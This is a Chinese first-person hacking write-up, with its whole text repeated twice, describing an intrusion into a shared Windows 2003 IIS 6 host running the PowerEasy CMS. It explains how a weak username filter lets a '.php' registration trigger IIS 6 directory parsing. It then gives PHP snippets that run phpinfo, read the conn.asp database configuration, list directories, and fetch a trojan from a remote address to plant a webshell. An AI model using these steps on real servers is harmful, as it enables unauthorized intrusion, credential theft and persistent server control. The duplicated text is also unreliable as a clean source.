原理 : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
突破的前提条件是 : 服务器是win2003 全功能的空间
**************************************************
'函数名:UserNamefilter(
'作 用:过滤用户名(增强过滤,用户名现用于建立个人文集目录)
'**************************************************
Function UserNamefilter(strChar)
If strChar = "" or IsNull(strChar) Then
UserNamefilter = ""
Exit Function
End If
Dim strBadChar, arrBadChar, tempChar, i
strBadChar = "',%,^,&,?,(,),<,>,[,],{,},/,\,;,:," & Chr(34) & "," & Chr(0) & ",*,|,"""
arrBadChar = Split(strBadChar, ",")
tempChar = strChar
For i = 0 To UBound(arrBadChar)
tempChar = Replace(tempChar, arrBadChar(i), "")
Next
UserNamefilter = Replace(Replace(Replace(Replace(LCase(tempChar),"cdx",""),"cer",""),"asp",""),"asa","")
End Function
%>
今天在看一个空间的时候,发现是动易,已打补丁.
旁注一查是虚拟主机 本来多没抱多大希望了
随便看了一下几个网站 发现是全能空间
拿出X-Scan狂扫一下 终端登录一下确定是win2003
默认的IIS 6解析文件名错误包含 .php .pl
动易Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
这就给我们机会了 呵呵
先看一下下面的图片默认的.asp用户名已经不能注册了
接着注册一个.php的用户
兴冲冲的把asp马改成jpg 去传结果如下
既然这个方法不行就要想其他办法了 既然是在.php的目录下 php语句不知道能不能执行
由于我PHP实在不懂,google狂找一下 难免弯路有走了很多
退回原来的思路 构建JPG GIF的文件头的PHP或者ASP木马 好像我还没那技术 呵呵
最后把jpg和php合并为jpg文件上传到空间
运行 发现能执行PHP语句 接下来事情就好办了
一
查看php配置信息 网站的绝对路径
<?php phpinfo(); ?>
二
读取conn.asp的内容
<?php
$file_handle = fopen("服务器本地地址", "r");
while (!feof($file_handle)) {
$line = fgets($file_handle);
echo $line;
}
fclose($file_handle);
?>
三
读取网站目录
<?php
$base_dir = "filelist/";
$fso = opendir($base_dir);
echo $base_dir."<hr/>" ;
while($flist=readdir($fso)){
echo $flist."<br/>" ;
}
closedir($fso)
?>
四
突破上传限制 得到webshell
<?php
$bruce=fopen("木马地址","r");
if(!$bruce)
{
echo'文件不存在';
exit;
}
while (!feof($bruce))
{
$rose=fgets($bruce);
$james=fopen("服务器本地路径","a");
fwrite($james,$rose);
fclose($james);
}
fclose($bruce);
?>
突破的前提条件是 : 服务器是win2003 全功能的空间
**************************************************
'函数名:UserNamefilter(
'作 用:过滤用户名(增强过滤,用户名现用于建立个人文集目录)
'**************************************************
Function UserNamefilter(strChar)
If strChar = "" or IsNull(strChar) Then
UserNamefilter = ""
Exit Function
End If
Dim strBadChar, arrBadChar, tempChar, i
strBadChar = "',%,^,&,?,(,),<,>,[,],{,},/,\,;,:," & Chr(34) & "," & Chr(0) & ",*,|,"""
arrBadChar = Split(strBadChar, ",")
tempChar = strChar
For i = 0 To UBound(arrBadChar)
tempChar = Replace(tempChar, arrBadChar(i), "")
Next
UserNamefilter = Replace(Replace(Replace(Replace(LCase(tempChar),"cdx",""),"cer",""),"asp",""),"asa","")
End Function
%>
今天在看一个空间的时候,发现是动易,已打补丁.
旁注一查是虚拟主机 本来多没抱多大希望了
随便看了一下几个网站 发现是全能空间
拿出X-Scan狂扫一下 终端登录一下确定是win2003
默认的IIS 6解析文件名错误包含 .php .pl
动易Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
这就给我们机会了 呵呵
先看一下下面的图片默认的.asp用户名已经不能注册了
接着注册一个.php的用户
兴冲冲的把asp马改成jpg 去传结果如下
既然这个方法不行就要想其他办法了 既然是在.php的目录下 php语句不知道能不能执行
由于我PHP实在不懂,google狂找一下 难免弯路有走了很多
退回原来的思路 构建JPG GIF的文件头的PHP或者ASP木马 好像我还没那技术 呵呵
最后把jpg和php合并为jpg文件上传到空间
运行 发现能执行PHP语句 接下来事情就好办了
一
查看php配置信息 网站的绝对路径
<?php phpinfo(); ?>
二
读取conn.asp的内容
<?php
$file_handle = fopen("服务器本地地址", "r");
while (!feof($file_handle)) {
$line = fgets($file_handle);
echo $line;
}
fclose($file_handle);
?>
三
读取网站目录
<?php
$base_dir = "filelist/";
$fso = opendir($base_dir);
echo $base_dir."<hr/>" ;
while($flist=readdir($fso)){
echo $flist."<br/>" ;
}
closedir($fso)
?>
四
突破上传限制 得到webshell
<?php
$bruce=fopen("木马地址","r");
if(!$bruce)
{
echo'文件不存在';
exit;
}
while (!feof($bruce))
{
$rose=fgets($bruce);
$james=fopen("服务器本地路径","a");
fwrite($james,$rose);
fclose($james);
}
fclose($bruce);
?>
